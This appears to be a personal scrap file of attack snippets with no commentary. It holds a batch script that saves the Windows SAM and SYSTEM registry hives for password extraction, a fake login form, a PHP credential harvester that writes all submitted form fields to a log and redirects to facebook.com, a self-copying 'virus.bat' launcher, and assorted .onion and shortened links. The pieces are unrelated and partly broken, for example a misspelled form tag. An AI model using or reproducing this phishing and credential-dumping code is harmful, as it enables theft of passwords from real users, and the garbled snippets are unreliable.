@echo off
reg SAVE HKLM\SAM C:\SAM
reg SAVE HKLM\SYSTEM C:\SYSTEM
Exit







<h3>Please login to proceed</h3> 
<from action=http:192.168.3.255>Username:<br>
<input type="username" name="username">
</br>Password:<br><input type="password" name="password"></br>
<br><input type="submit" value="Logon"></br>


@echo off
chdir /d %CD%
copy virus.bat
start virus.bat

http://testphp.vulnweb.com/listproducts.php?cat=1


http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page

http://ytxmrc3pcbv5464e.onion.ws/files

https://tinyurl.com/y2soyc6g

http://3g2upl4pq6kufc4m.onion/


<?php
header ('Location: facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>
